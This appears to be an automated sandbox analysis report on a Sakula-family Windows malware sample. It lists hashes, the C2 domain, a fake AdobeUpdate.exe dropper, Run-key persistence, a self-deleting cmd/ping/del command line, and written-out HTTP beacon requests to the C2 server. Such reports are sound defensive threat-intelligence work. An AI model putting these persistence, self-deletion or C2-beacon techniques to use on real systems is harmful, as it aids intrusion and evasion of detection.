Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
01/02/2025, 12:34 UTC
Behavioral task
behavioral1
Sample
7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe
Resource
win10v2004-20250129-en
General
-
Target
7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe
-
Size
92KB
-
MD5
af9c2ef84126a4db946fab35fc7d38b1
-
SHA1
30e07ab93c52099ed5273f45c7ecf26c3d51ed5e
-
SHA256
7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e
-
SHA512
4988952148675816663191fe9fc9cefbb6539a214bdcafcb865464cfcce80820c5db34a3e4a83ce792d43040913ad6d626c7b90f8c1b6a54a27feede2d82aa2d
-
SSDEEP
1536:TJbCiJVkgMaT2itTkjoRXnM48dXFajVPYxCEtkz30rtrC:9bfVk29te2jqxCEtg30BO
Malware Config
Extracted
sakula
www.savmpet.com
Signatures
-
Sakula family
-
Sakula payload 1 IoCs
resource yara_rule behavioral1/files/0x00080000000186e7-1.dat family_sakula -
Deletes itself 1 IoCs
pid Process 2700 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2348 AdobeUpdate.exe -
Loads dropped DLL 4 IoCs
pid Process 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe 2348 AdobeUpdate.exe 2348 AdobeUpdate.exe 2348 AdobeUpdate.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\AdobeUpdate = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MicroMedia\\AdobeUpdate.exe" 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AdobeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2700 cmd.exe 2324 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2324 PING.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeIncBasePriorityPrivilege 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 588 wrote to memory of 2348 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe 31 PID 588 wrote to memory of 2348 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe 31 PID 588 wrote to memory of 2348 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe 31 PID 588 wrote to memory of 2348 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe 31 PID 588 wrote to memory of 2348 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe 31 PID 588 wrote to memory of 2348 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe 31 PID 588 wrote to memory of 2348 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe 31 PID 588 wrote to memory of 2700 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe 33 PID 588 wrote to memory of 2700 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe 33 PID 588 wrote to memory of 2700 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe 33 PID 588 wrote to memory of 2700 588 7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe 33 PID 2700 wrote to memory of 2324 2700 cmd.exe 35 PID 2700 wrote to memory of 2324 2700 cmd.exe 35 PID 2700 wrote to memory of 2324 2700 cmd.exe 35 PID 2700 wrote to memory of 2324 2700 cmd.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe"C:\Users\Admin\AppData\Local\Temp\7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Users\Admin\AppData\Local\Temp\MicroMedia\AdobeUpdate.exeC:\Users\Admin\AppData\Local\Temp\MicroMedia\AdobeUpdate.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2348
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 & del /q "C:\Users\Admin\AppData\Local\Temp\7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe"2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.13⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2324
-
-
Network
-
Remote address:8.8.8.8:53Requestwww.savmpet.comIN AResponsewww.savmpet.comIN A52.34.198.229
-
POSThttp://www.savmpet.com/newimage.asp?imageid=cwpfqzec-1909178559&type=0&resid=259444420AdobeUpdate.exeRemote address:52.34.198.229:80RequestPOST /newimage.asp?imageid=cwpfqzec-1909178559&type=0&resid=259444420 HTTP/1.1
User-Agent: iexplorer
Host: www.savmpet.com
Content-Length: 176
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 01 Feb 2025 12:34:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.www.savmpet.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=www.savmpet.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=ce7167a7a785479c822349ddfded9303|181.215.176.83|1738413259|1738413259|0|1|0; path=/; domain=.savmpet.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
Remote address:52.34.198.229:80RequestGET /photo/cwpfqzec-1909178559.jpg?resid=259447805 HTTP/1.1
User-Agent: iexplorer
Host: www.savmpet.com
Cache-Control: no-cache
Cookie: btst=ce7167a7a785479c822349ddfded9303|181.215.176.83|1738413259|1738413259|0|1|0; snkz=181.215.176.83
ResponseHTTP/1.1 200 OK
Date: Sat, 01 Feb 2025 12:34:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.www.savmpet.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=www.savmpet.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=ce7167a7a785479c822349ddfded9303|181.215.176.83|1738413259|1738413259|0|2|0; path=/; domain=.savmpet.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
-
52.34.198.229:80http://www.savmpet.com/newimage.asp?imageid=cwpfqzec-1909178559&type=0&resid=259444420httpAdobeUpdate.exe580 B 872 B 5 5
HTTP Request
POST http://www.savmpet.com/newimage.asp?imageid=cwpfqzec-1909178559&type=0&resid=259444420HTTP Response
200 -
52.34.198.229:80http://www.savmpet.com/photo/cwpfqzec-1909178559.jpg?resid=259447805httpAdobeUpdate.exe475 B 792 B 5 5
HTTP Request
GET http://www.savmpet.com/photo/cwpfqzec-1909178559.jpg?resid=259447805HTTP Response
200 -
152 B 3
-
152 B 3
-
152 B 3
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
92KB
MD5442967e1ca0a0d8408004088db487be4
SHA163faab4d648ffce4e429fdb5b376d64a72bf5469
SHA256db4de96bcbc462c200b08eab0d3e24a55bc4713e5dd6e99c08639dac3f800894
SHA512acee3765a0db149f63c1876faf928e8a4eef051b8d5426532dda02f0ea24208601eb20f93db98348fd8fbba04acdfa46c9287612e85b28db668f2633131fa983